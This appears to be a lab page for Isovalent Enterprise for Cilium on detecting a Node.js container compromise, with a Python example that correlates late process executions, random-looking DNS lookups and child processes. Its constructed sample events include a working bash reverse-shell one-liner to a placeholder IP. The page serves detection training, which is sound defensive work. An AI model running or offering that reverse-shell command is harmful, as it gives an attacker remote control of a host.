Isovalent Enterprise for Cilium: Security Visibility
In this scenario, we simulate the exploitation of a Node.js application: the attacker spawns a reverse shell inside a container and then moves laterally within the Kubernetes environment.
We will demonstrate how combined process and network event data can:
- identify the suspicious late process execution (a shell spawned long after the pod's workload started)
- tie the suspicious processes to a randomly generated external domain name
- trace the attacker's post-exploit lateral movement and data exfiltration
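The three bullets above describe one correlation: flag processes that start well after their pod's workload did, attach the DNS lookups those processes (and their children) made, and check whether the looked-up names look machine-generated. The following is an added example of that logic, not code from the lab or from Hubble Enterprise; the event dictionaries are constructed sample data in a simplified, hypothetical schema (`kind`, `ts`, `pod`, `pid`, `ppid`, `binary`, `args`, `dns_name`), not the product's real event format, and the entropy threshold is an assumption chosen for the sample.

```python
"""Correlate process-execution and DNS events to surface a late-spawned shell.

Illustrative code only: the schema below is hypothetical and the events are
constructed, so nothing here reflects Hubble Enterprise's actual JSON format.
"""
import math
from collections import Counter

# Constructed sample events (not real captures). ts = epoch seconds.
EVENTS = [
    {"kind": "process_exec", "ts": 1000, "pod": "default/nodejs-app", "pid": 1, "ppid": 0,
     "binary": "/usr/local/bin/node", "args": "server.js"},
    {"kind": "process_exec", "ts": 1650, "pod": "default/nodejs-app", "pid": 42, "ppid": 1,
     "binary": "/bin/sh", "args": "-c bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"},
    {"kind": "dns_request", "ts": 1652, "pod": "default/nodejs-app", "pid": 42,
     "dns_name": "xk9qz2bv7tw4lm.example"},
    {"kind": "process_exec", "ts": 1660, "pod": "default/nodejs-app", "pid": 43, "ppid": 42,
     "binary": "/usr/bin/curl", "args": "http://10.0.1.17:8080/admin"},
    {"kind": "process_exec", "ts": 1005, "pod": "default/other-app", "pid": 1, "ppid": 0,
     "binary": "/usr/bin/python3", "args": "app.py"},
    {"kind": "dns_request", "ts": 1100, "pod": "default/other-app", "pid": 1,
     "dns_name": "api.github.com"},
]


def pod_start_times(events):
    """Earliest process_exec timestamp per pod, used as the pod's start time."""
    starts = {}
    for e in events:
        if e["kind"] == "process_exec":
            starts[e["pod"]] = min(starts.get(e["pod"], e["ts"]), e["ts"])
    return starts


def late_execs(events, grace_seconds=300):
    """Process executions that begin more than grace_seconds after pod start.

    A service normally spawns its processes at startup; a shell appearing
    hundreds of seconds later is the 'late process execution' of interest.
    """
    starts = pod_start_times(events)
    return [e for e in events
            if e["kind"] == "process_exec" and e["ts"] - starts[e["pod"]] > grace_seconds]


def shannon_entropy(s):
    """Bits of entropy per character of s."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(dns_name, min_len=10, entropy_threshold=3.0):
    """Crude DGA heuristic: the leftmost label is long and high-entropy.

    The threshold is an assumption tuned to the sample; real deployments
    should calibrate against their own DNS baseline.
    """
    label = dns_name.split(".")[0]
    return len(label) >= min_len and shannon_entropy(label) >= entropy_threshold


def correlate(events, grace_seconds=300):
    """One finding per suspicious process tree: the late-spawned root process,
    its random-looking DNS lookups, and the descendants it spawned."""
    late = late_execs(events, grace_seconds)
    flagged = {(e["pod"], e["pid"]) for e in late}
    starts = pod_start_times(events)
    findings = []
    for e in late:
        if (e["pod"], e["ppid"]) in flagged:
            continue  # already covered under its flagged parent
        tree = {e["pid"]}
        changed = True
        while changed:  # collect descendants transitively via ppid links
            changed = False
            for x in events:
                if (x["kind"] == "process_exec" and x["pod"] == e["pod"]
                        and x["ppid"] in tree and x["pid"] not in tree):
                    tree.add(x["pid"])
                    changed = True
        dns = [x["dns_name"] for x in events
               if x["kind"] == "dns_request" and x["pod"] == e["pod"] and x["pid"] in tree]
        descendants = [(x["binary"], x["args"]) for x in events
                       if x["kind"] == "process_exec" and x["pod"] == e["pod"]
                       and x["pid"] in tree and x["pid"] != e["pid"]]
        findings.append({
            "pod": e["pod"], "pid": e["pid"], "binary": e["binary"], "args": e["args"],
            "seconds_after_start": e["ts"] - starts[e["pod"]],
            "random_looking_dns": [d for d in dns if looks_random(d)],
            "descendants": descendants,
        })
    return findings


if __name__ == "__main__":
    for finding in correlate(EVENTS):
        print(finding)
```

Run as-is it reports a single finding: `/bin/sh` in `default/nodejs-app` started 650 s after the pod's `node` process, resolved a high-entropy name, and spawned a `curl` toward an internal address, while the legitimate lookup of `api.github.com` from `other-app` is left alone. The process tree is walked by `ppid` so the child `curl` is attributed to the shell rather than reported as a separate alert.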
Difficulty: Intermediate
Version: Enterprise
Topics: Security
Main steps in the lab
1. 🚀 Deploying a demo app: Let's deploy the demo app!
2. 👓 Explore Process and Network Events: Now, with our application deployed, how do we view events?
3. 🛰️ Viewing Processes in Hubble Enterprise: Let's go through a security use case!
4. 👨🏻💻 Observe security events as raw JSON: How do we see events as JSON?